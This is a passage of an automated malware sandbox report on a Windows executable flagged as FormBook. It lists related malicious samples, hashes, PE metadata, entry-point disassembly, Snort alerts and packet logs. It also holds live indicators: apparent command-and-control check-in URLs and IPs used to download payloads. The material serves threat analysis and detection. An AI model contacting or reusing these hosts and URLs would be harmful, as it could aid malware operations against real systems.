                                                • www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH
                                                D6mimHOcsr.exeGet hashmaliciousBrowse
                                                • www.wmarquezy.com/bw82/?7n=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YS9KDr+Saej&RZ=Y4C4ZlKPDRhPDXy
                                                r.exeGet hashmaliciousBrowse
                                                • www.andrewsreadingjournal.com/uds2/?_jPlXT=HdLSVyUFGLZERDc21vAze+eEMrorFA8CuNZ+YPXMfnOMoW52wWx899FazcdJxWS7BsXFqvIALA==&n4=iN68RdPpj

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                shops.myshopify.comRQP_10378065.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                9VZe9OnL4V.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                transferir copia_98087.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                0O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                4pFzkB6ePK.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                PO_210222.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                SecuriteInfo.com.Trojan.Inject4.6572.10651.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                PDF.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                D6ui5xr64I.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Drawings.xlsmGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Purchase order.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                IMG_7189012.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                • 23.227.38.74

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                AUTOMATTICUS55gfganfgF.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                RFQ TRQ04022020_pdf.exeGet hashmaliciousBrowse
                                                • 192.0.78.133
                                                dwg.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                • 192.0.84.247
                                                AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                D6ui5xr64I.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                P.O-48452689535945.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                CMahQwuvAE.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                kgozmovHpY.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                ransomware.exeGet hashmaliciousBrowse
                                                • 192.0.78.12
                                                po.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                • 192.0.78.12
                                                HENGTONG-IDC-LLCUSPO_210222.exeGet hashmaliciousBrowse
                                                • 104.232.96.251
                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                • 202.14.6.113
                                                zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                • 203.88.111.71
                                                Payment_Advice.exeGet hashmaliciousBrowse
                                                • 107.178.135.177
                                                Order 8953-PDF.exeGet hashmaliciousBrowse
                                                • 103.202.50.110
                                                IN 20201125 PL.xlsxGet hashmaliciousBrowse
                                                • 45.41.85.153
                                                Order Catalogue.xlsxGet hashmaliciousBrowse
                                                • 146.148.242.120
                                                documents_0084568546754.exeGet hashmaliciousBrowse
                                                • 104.232.66.117
                                                EK6BR1KS50.exeGet hashmaliciousBrowse
                                                • 146.148.193.212
                                                SWIFT Payment DOOEL EUR 74,246.41 20210101950848.exeGet hashmaliciousBrowse
                                                • 107.178.135.177
                                                Arrival Notice.exeGet hashmaliciousBrowse
                                                • 146.148.192.218
                                                PO101420.exeGet hashmaliciousBrowse
                                                • 203.76.236.102
                                                J0OmHIagw8.exeGet hashmaliciousBrowse
                                                • 146.148.193.212
                                                urgent specification request.exeGet hashmaliciousBrowse
                                                • 45.42.89.146
                                                Doc_74657456348374.xlsx.exeGet hashmaliciousBrowse
                                                • 104.232.66.117
                                                XWW8KE7078.exeGet hashmaliciousBrowse
                                                • 45.41.85.153
                                                yKFlKg9R6m.exeGet hashmaliciousBrowse
                                                • 45.41.85.153
                                                current productlist.exeGet hashmaliciousBrowse
                                                • 107.178.155.203
                                                Details!!!!.exeGet hashmaliciousBrowse
                                                • 146.148.190.200
                                                googlechrome_3843.exeGet hashmaliciousBrowse
                                                • 146.148.193.212

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):5.724499720734536
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:dwg.exe
                                                File size:98304
                                                MD5:6a9035b7435c6aa9e6c8e31cf771e316
                                                SHA1:16a6d2ac44b8ac3cbe112916d8cd9912d3f0dbf7
                                                SHA256:6f33f5e3a23420dacdc26fb8e2eef07fe482e634d4b832b0917cbe7ed37864f5
                                                SHA512:bc77de47966c4efff0220fbac4ce74051d76b283eac0d2c7ebeeadb680cccbc96bc303ed6df3606c87071a87854c1fcbf2b2dd5eeb5909ce83600dce8643fc04
                                                SSDEEP:1536:AbLxrs30pwHPhtvxYovnvasYyFbJotMK8nlKmbL:ILPM5QyF1vHL
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L...e.]N.................0...P......H........@....@

                                                File Icon

                                                Icon Hash:10b0b2095489f81e

                                                Static PE Info

                                                General

                                                Entrypoint:0x401348
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:
                                                Time Stamp:0x4E5D1F65 [Tue Aug 30 17:35:33 2011 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:c6ebaa5f331077d9c6c3ae892d7a39ce

                                                Entrypoint Preview

                                                Instruction
                                                push 00404250h
                                                call 00007F84D4A2D675h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                xor byte ptr [eax], al
                                                add byte ptr [eax], al
                                                inc eax
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx-62h], bh
                                                sbb dh, byte ptr [edi+4685EFCEh]
                                                stosd
                                                push esp
                                                mov eax, E57BCCEEh
                                                fadd dword ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx+4Eh], al
                                                push esp
                                                inc ebp
                                                push edx
                                                dec ecx
                                                inc ecx
                                                inc esp
                                                inc edi
                                                push edx
                                                dec ecx
                                                pop edx
                                                pop edx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add bh, bh
                                                int3
                                                xor dword ptr [eax], eax
                                                and byte ptr [ebp+16h], ah
                                                rol dh, cl
                                                and eax, B44EA7F0h
                                                jecxz 00007F84D4A2D696h
                                                movsb
                                                cmp bh, ch
                                                retn 8EA3h
                                                mov bl, C0h
                                                jc 00007F84D4A2D664h
                                                daa
                                                inc edi
                                                test al, B7h
                                                jne 00007F84D4A2D6F7h
                                                push 3A215E00h
                                                dec edi
                                                lodsd
                                                xor ebx, dword ptr [ecx-48EE309Ah]
                                                or al, 00h
                                                stosb
                                                add byte ptr [eax-2Dh], ah
                                                xchg eax, ebx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                in eax, 2Dh
                                                add byte ptr [eax], al
                                                out dx, eax
                                                daa
                                                add byte ptr [eax], al
                                                add byte ptr [eax], cl
                                                add byte ptr [edx+45h], al
                                                push esi
                                                inc edi
                                                inc ebp
                                                dec esp
                                                push ebx
                                                inc ebp
                                                add byte ptr [42000C01h], cl
                                                jnc 00007F84D4A2D6F7h
                                                imul ebp, dword ptr [esp+ebp*2+00h], 00000000h

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x136f40x3c.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x2c72.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x30
                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000xd8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x12b040x13000False0.439453125data6.24870257971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .data0x140000x19cc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .rsrc0x160000x2c720x3000False0.409342447917data4.49735724086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x17dca0xea8data
                                                RT_ICON0x175220x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 2763565, next used block 3552051
                                                RT_ICON0x16fba0x568GLS_BINARY_LSB_FIRST
                                                RT_ICON0x16cd20x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3207626755, next used block 12467
                                                RT_ICON0x16baa0x128GLS_BINARY_LSB_FIRST
                                                RT_ICON0x165420x668data
                                                RT_GROUP_ICON0x164e80x5adata
                                                RT_VERSION0x161e00x308dataChineseChina

                                                Imports

                                                DLLImport
                                                USER32.DLLHideCaret
                                                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                Version Infos

                                                DescriptionData
                                                Translation0x0804 0x04b0
                                                LegalCopyrightInternal Verify Number,88
                                                InternalNameStoveddrif
                                                FileVersion1.00
                                                CompanyNameInternal Verify Number,88
                                                LegalTrademarksInternal Verify Number,88
                                                ProductNameANTERIADGRIZZ
                                                ProductVersion1.00
                                                OriginalFilenameStoveddrif.exe

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                ChineseChina

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                02/25/21-15:34:16.437721TCP2018752ET TROJAN Generic .bin download from Dotted Quad4971680192.168.2.545.153.203.33
                                                02/25/21-15:34:59.716490TCP1201ATTACK-RESPONSES 403 Forbidden804972123.227.38.74192.168.2.5
                                                02/25/21-15:35:04.845968TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                02/25/21-15:35:04.845968TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                02/25/21-15:35:04.845968TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                02/25/21-15:35:04.985802TCP1201ATTACK-RESPONSES 403 Forbidden804972734.102.136.180192.168.2.5
                                                02/25/21-15:35:40.123188ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                                02/25/21-15:35:41.133951ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 25, 2021 15:34:16.374516964 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.436796904 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.436944962 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.437721014 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496598005 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496635914 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496656895 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496682882 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496690989 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496706009 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496721983 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496727943 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496752024 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496774912 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496777058 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496798038 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496805906 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496819973 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496850014 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496882915 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.552798986 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552834988 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552855968 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552880049 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552896976 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.552903891 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552927971 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552930117 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.552949905 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552973986 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552982092 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.552997112 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553010941 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553019047 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553040028 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553060055 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553078890 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553090096 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553102970 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553114891 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553126097 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553150892 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553150892 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553174973 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553178072 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553200960 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553211927 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553224087 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553255081 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553303957 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553766966 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553790092 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553852081 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553875923 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608613968 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608660936 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608685970 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608709097 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608732939 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608740091 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608757019 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608778954 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608799934 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608803988 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608824015 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608850956 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608874083 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608882904 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608896971 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608913898 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608923912 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608949900 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608968019 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608983040 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608999014 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609016895 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609028101 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609044075 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609066963 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609091043 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609117031 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609138966 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609163046 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609183073 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609195948 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609220028 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609230995 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609244108 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609266996 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609278917 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609289885 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609313965 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609323978 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609338045 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609360933 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609400988 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609406948 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609431982 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609442949 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609456062 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609477997 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609488964 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609530926 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.610033035 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.610063076 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.610085011 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.610090971 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.610109091 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.610119104 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.610146046 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.610179901 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666023016 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666060925 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666084051 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666105032 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666126966 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666145086 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666151047 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666168928 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666193008 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666194916 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666213036 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666235924 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666250944 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666260004 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666280031 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666282892 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666306019 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666310072 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666327953 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666352987 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666357040 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666378021 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666399956 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666400909 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666424990 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666428089 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666448116 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666467905 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666471004 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666493893 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666502953 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666522026 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666543007 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666547060 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666569948 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666584015 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666593075 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666611910 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666618109 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666640997 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666649103 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666663885 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666676998 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666687965 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666711092 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666714907 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666733027 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666754007 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666754961 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666776896 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666801929 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666802883 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.666826010 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.666834116 CET4971680192.168.2.545.153.203.33
